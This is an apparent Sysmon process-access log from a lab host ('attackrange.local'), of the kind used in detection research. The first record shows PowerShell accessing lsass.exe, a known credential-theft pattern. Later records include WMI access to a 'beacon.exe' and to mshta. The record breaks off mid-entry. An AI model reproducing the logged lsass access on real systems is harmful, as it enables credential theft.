16:54:42.420{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program 